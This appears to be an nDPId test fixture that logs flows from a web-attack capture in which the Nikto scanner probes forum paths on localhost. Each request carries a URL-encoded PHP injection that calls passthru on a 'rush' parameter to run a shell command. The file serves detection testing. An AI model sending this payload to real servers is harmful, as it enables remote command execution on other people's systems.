-01233{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":685,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277800,"flow_last_seen":1576420277800,"flow_idle_time":7440000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277800,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50932,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":686,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277802,"flow_last_seen":1576420277802,"flow_idle_time":7440000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1576420277802,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50934,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00907{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":686,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":686,"flow_packet_id":1,"flow_last_seen":1576420277802,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"thread_ts_msec":1576420277802,"pkt":"AAAAAAAAAAAAAAAACABFAAF0IClAAEAGG1l\/AAABfwAAAcb2H5CLkRkOnTgF7oAYAED\/aAAAAQEICp1m\/1GdZv9RR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9uYW1lPUZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNmMlNzMlMjAlMmQlNjElNmMmaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk3KQ0KDQo="} -01239{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":686,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277802,"flow_last_seen":1576420277802,"flow_idle_time":7440000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1576420277802,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50934,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":687,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":687,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277803,"flow_last_seen":1576420277803,"flow_idle_time":7440000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":1576420277803,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50936,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00899{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":687,"flow_packet_id":1,"flow_last_seen":1576420277803,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":380,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":380,"pkt_l4_len":346,"thread_ts_msec":1576420277803,"pkt":"AAAAAAAAAAAAAAAACABFAAFudhVAAEAGxXJ\/AAABfwAAAcb4H5C7R086db2J2oAYAED\/YgAAAQEICp1m\/1OdZv9TR0VUIC9tb2R1bGVzL2luZGV4LnBocD9uYW1lPUZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNmMlNzMlMjAlMmQlNjElNmMmaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5NykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
-01232{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":687,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":687,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277803,"flow_last_seen":1576420277803,"flow_idle_time":7440000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":1576420277803,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50936,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":688,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277804,"flow_last_seen":1576420277804,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277804,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50938,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":688,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":688,"flow_packet_id":1,"flow_last_seen":1576420277804,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":1576420277804,"pkt":"AAAAAAAAAAAAAAAACABFAAFsoC9AAEAGm1p\/AAABfwAAAcb6H5AztpkH42OkkoAYAED\/YAAAAQEICp1m\/1SdZv9UR0VUIC9waHBCQi9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5NykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01230{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":688,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277804,"flow_last_seen":1576420277804,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277804,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50938,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":689,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277807,"flow_last_seen":1576420277807,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277807,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50940,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":689,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":689,"flow_packet_id":1,"flow_last_seen":1576420277807,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":1576420277807,"pkt":"AAAAAAAAAAAAAAAACABFAAFsAqdAAEAGOON\/AAABfwAAAcb8H5ASjTuPR79V4YAYAED\/YAAAAQEICp1m\/1edZv9XR0VUIC9mb3J1bS9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
-01230{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":689,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277807,"flow_last_seen":1576420277807,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277807,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50940,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":690,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":690,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277808,"flow_last_seen":1576420277808,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277808,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50942,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00893{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":690,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":690,"flow_packet_id":1,"flow_last_seen":1576420277808,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277808,"pkt":"AAAAAAAAAAAAAAAACABFAAFnxERAAEAGd0p\/AAABfwAAAcb+H5AIB\/1vYBeRA4AYAED\/WwAAAQEICp1m\/1idZv9YR0VUIC9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk3KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01224{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":690,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":690,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277808,"flow_last_seen":1576420277808,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277808,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50942,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":691,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277810,"flow_last_seen":1576420277810,"flow_idle_time":7440000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":316,"midstream":1,"thread_ts_msec":1576420277810,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50944,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00905{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":691,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":691,"flow_packet_id":1,"flow_last_seen":1576420277810,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":382,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":382,"pkt_l4_len":348,"thread_ts_msec":1576420277810,"pkt":"AAAAAAAAAAAAAAAACABFAAFwFdRAAEAGJbJ\/AAABfwAAAccAH5A7eCz\/38X+m4AYAED\/ZAAAAQEICp1m\/1mdZv9ZR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk3KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01234{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":691,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277810,"flow_last_seen":1576420277810,"flow_idle_time":7440000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":316,"midstream":1,"thread_ts_msec":1576420277810,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50944,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":692,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277811,"flow_last_seen":1576420277811,"flow_idle_time":7440000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":321,"midstream":1,"thread_ts_msec":1576420277811,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50946,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00908{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":692,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":692,"flow_packet_id":1,"flow_last_seen":1576420277811,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":387,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":387,"pkt_l4_len":353,"thread_ts_msec":1576420277811,"pkt":"AAAAAAAAAAAAAAAACABFAAF1vbdAAEAGfcl\/AAABfwAAAccCH5DikYSaCicX\/4AYAED\/aQAAAQEICp1m\/1udZv9bR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9OaWt0bz1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTcpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01240{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":692,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277811,"flow_last_seen":1576420277811,"flow_idle_time":7440000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":321,"midstream":1,"thread_ts_msec":1576420277811,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50946,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":693,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":693,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277812,"flow_last_seen":1576420277812,"flow_idle_time":7440000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277812,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50948,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00899{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":693,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":693,"flow_packet_id":1,"flow_last_seen":1576420277812,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":381,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":381,"pkt_l4_len":347,"thread_ts_msec":1576420277812,"pkt":"AAAAAAAAAAAAAAAACABFAAFvwN5AAEAGeqh\/AAABfwAAAccEH5A7SvnykFHzA4AYAED\/YwAAAQEICp1m\/1ydZv9cR0VUIC9tb2R1bGVzL2luZGV4LnBocD9OaWt0bz1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5NykNCg0K"} 
-01233{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":693,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":693,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277812,"flow_last_seen":1576420277812,"flow_idle_time":7440000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277812,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50948,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":694,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277813,"flow_last_seen":1576420277813,"flow_idle_time":7440000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277813,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50950,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
